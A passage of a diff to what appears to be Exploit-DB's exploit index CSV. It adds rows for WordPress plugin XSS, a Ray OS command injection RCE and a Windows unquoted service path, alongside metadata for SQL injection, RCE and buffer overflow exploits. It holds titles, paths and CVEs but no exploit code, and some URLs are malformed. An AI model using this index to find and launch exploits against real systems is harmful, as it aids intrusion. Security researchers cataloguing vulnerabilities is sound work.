(2)",2021-07-07,"Beren Kuday GÖRÜN",webapps,php,,2021-07-07,2021-07-07,0,CVE-2018-15877,,,,http://www.exploit-db.complainview-activity-monitor.20161228.zip, +51981,exploits/php/webapps/51981.txt,"Wordpress Plugin Playlist for Youtube 1.32 - Stored Cross-Site Scripting (XSS)",2024-04-12,Erdemstar,webapps,php,,2024-04-12,2024-04-12,0,,,,,, 38048,exploits/php/webapps/38048.txt,"WordPress Plugin Plg Novana - 'id' SQL Injection",2012-11-22,sil3nt,webapps,php,,2012-11-22,2015-09-01,1,OSVDB-87839,"WordPress Plugin",,,,https://www.securityfocus.com/bid/56661/info 38376,exploits/php/webapps/38376.txt,"WordPress Plugin podPress - 'playerID' Cross-Site Scripting",2013-03-11,hiphop,webapps,php,,2013-03-11,2015-10-01,1,CVE-2013-2714;OSVDB-91129,"WordPress Plugin",,,,https://www.securityfocus.com/bid/58421/info 50052,exploits/php/webapps/50052.txt,"WordPress Plugin Poll_ Survey_ Questionnaire and Voting system 1.5.2 - 'date_answers' Blind SQL Injection",2021-06-23,"Toby Jackson",webapps,php,,2021-06-23,2021-06-23,0,,,,,http://www.exploit-db.compolls-widget.1.5.2.zip, @@ -33923,6 +33931,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 50772,exploits/php/webapps/50772.py,"WordPress Plugin WP User Frontend 3.5.25 - SQLi (Authenticated)",2022-02-21,"Ron Jost",webapps,php,,2022-02-21,2022-02-21,0,CVE-2021-25076,,,,http://www.exploit-db.comwp-user-frontend.3.5.25.zip, 39422,exploits/php/webapps/39422.py,"WordPress Plugin WP User Frontend < 2.3.11 - Unrestricted Arbitrary File Upload",2016-02-08,"Panagiotis Vagenas",webapps,php,80,2016-02-08,2016-02-08,0,,"WordPress Plugin",,,, 40850,exploits/php/webapps/40850.txt,"WordPress Plugin WP Vault 0.8.6.6 - Local File Inclusion",2016-11-30,"Lenon Leite",webapps,php,,2016-11-30,2016-11-30,1,,,,http://www.exploit-db.com/screenshots/idlt41000/screen-shot-2016-11-30-at-191812.png,http://www.exploit-db.comwp-vault.0.8.6.6.zip, +51987,exploits/php/webapps/51987.txt,"Wordpress Plugin WP Video Playlist 1.1.1 - Stored Cross-Site Scripting (XSS)",2024-04-12,Erdemstar,webapps,php,,2024-04-12,2024-04-12,0,,,,,, 50619,exploits/php/webapps/50619.py,"WordPress Plugin WP Visitor Statistics 4.7 - SQL Injection",2022-01-05,"Ron Jost",webapps,php,,2022-01-05,2022-01-05,0,CVE-2021-24750,,,,http://www.exploit-db.comwp-stats-manager.4.7.zip, 44544,exploits/php/webapps/44544.php,"WordPress Plugin WP with Spritz 1.0 - Remote File Inclusion",2018-04-26,Wadeek,webapps,php,,2018-04-26,2018-04-26,0,,,,,http://www.exploit-db.comwp-with-spritz.zip, 18353,exploits/php/webapps/18353.txt,"WordPress Plugin wp-autoyoutube - Blind SQL Injection",2012-01-12,longrifle0x,webapps,php,,2012-01-12,2012-06-22,0,OSVDB-82542,"WordPress Plugin",,,http://www.exploit-db.comwp-autoyoutube.0.1.zip, @@ -34912,6 +34921,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 51532,exploits/python/webapps/51532.py,"PyLoad 0.5.0 - Pre-auth Remote Code Execution (RCE)",2023-06-14,"Gabriel Lima",webapps,python,,2023-06-20,2023-06-20,1,CVE-2023-0297,,,,, 39199,exploits/python/webapps/39199.html,"Pyplate - 'addScript.py' Cross-Site Request Forgery",2014-05-23,"Henri Salo",webapps,python,,2014-05-23,2016-01-08,1,CVE-2014-3854;OSVDB-107099,,,,,https://www.securityfocus.com/bid/67610/info 51669,exploits/python/webapps/51669.txt,"Pyro CMS 3.9 - Server-Side Template Injection (SSTI) (Authenticated)",2023-08-08,"Daniel Barros",webapps,python,,2023-08-08,2023-08-08,0,CVE-2023-29689,,,,, +51978,exploits/python/webapps/51978.txt,"Ray OS v2.6.3 - Command Injection RCE(Unauthorized)",2024-04-12,Fire_Wolf,webapps,python,,2024-04-12,2024-04-12,0,CVE-2023-6019,,,,, 51226,exploits/python/webapps/51226.txt,"Roxy WI v6.1.0.0 - Improper Authentication Control",2023-04-03,"Nuri Çilengir",webapps,python,,2023-04-03,2023-05-24,1,CVE-2022-31125,,,,, 51227,exploits/python/webapps/51227.txt,"Roxy WI v6.1.0.0 - Unauthenticated Remote Code Execution (RCE)",2023-04-03,"Nuri Çilengir",webapps,python,,2023-04-03,2023-06-04,1,CVE-2022-31126,,,,, 51228,exploits/python/webapps/51228.txt,"Roxy WI v6.1.1.0 - Unauthenticated Remote Code Execution (RCE) via ssl_cert Upload",2023-04-03,"Nuri Çilengir",webapps,python,,2023-04-03,2023-04-03,0,CVE-2022-31161,,,,, @@ -46391,6 +46401,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 39520,exploits/windows_x86-64/local/39520.txt,"Secret Net 7 and Secret Net Studio 8 - Local Privilege Escalation",2016-03-02,Cr4sh,local,windows_x86-64,,2016-03-02,2016-03-02,0,,,,,,https://github.com/Cr4sh/secretnet_expl 40451,exploits/windows_x86-64/local/40451.rb,"Street Fighter 5 - 'Capcom.sys' Kernel Execution (Metasploit)",2016-10-03,"OJ Reeves",local,windows_x86-64,,2016-10-03,2016-10-03,1,,"Metasploit Framework (MSF)",,,, 40342,exploits/windows_x86-64/local/40342.py,"TeamViewer 11.0.65452 (x64) - Local Credentials Disclosure",2016-09-07,"Alexander Korznikov",local,windows_x86-64,,2016-09-07,2016-09-07,0,,,,,, +51977,exploits/windows_x86-64/local/51977.txt,"Terratec dmx_6fire USB - Unquoted Service Path",2024-04-12,"Joseph Kwabena Fiagbor",local,windows_x86-64,,2024-04-12,2024-04-12,0,CVE-2024-31804,,,,, 51843,exploits/windows_x86-64/local/51843.txt,"Windows PowerShell - Event Log Bypass Single Quote Code Execution",2024-03-03,hyp3rlinx,local,windows_x86-64,,2024-03-03,2024-03-03,0,,,,,, 45197,exploits/windows_x86-64/remote/45197.rb,"Cloudme 1.9 - Buffer Overflow (DEP) (Metasploit)",2018-08-14,"Raymond Wellnitz",remote,windows_x86-64,,2018-08-14,2018-08-14,0,CVE-2018-6892,,,,, 46250,exploits/windows_x86-64/remote/46250.py,"CloudMe Sync 1.11.2 Buffer Overflow - WoW64 (DEP Bypass)",2019-01-28,"Matteo Malvica",remote,windows_x86-64,,2019-01-28,2019-01-29,0,CVE-2018-6892,Remote,,,http://www.exploit-db.comCloudMe_1112.exe,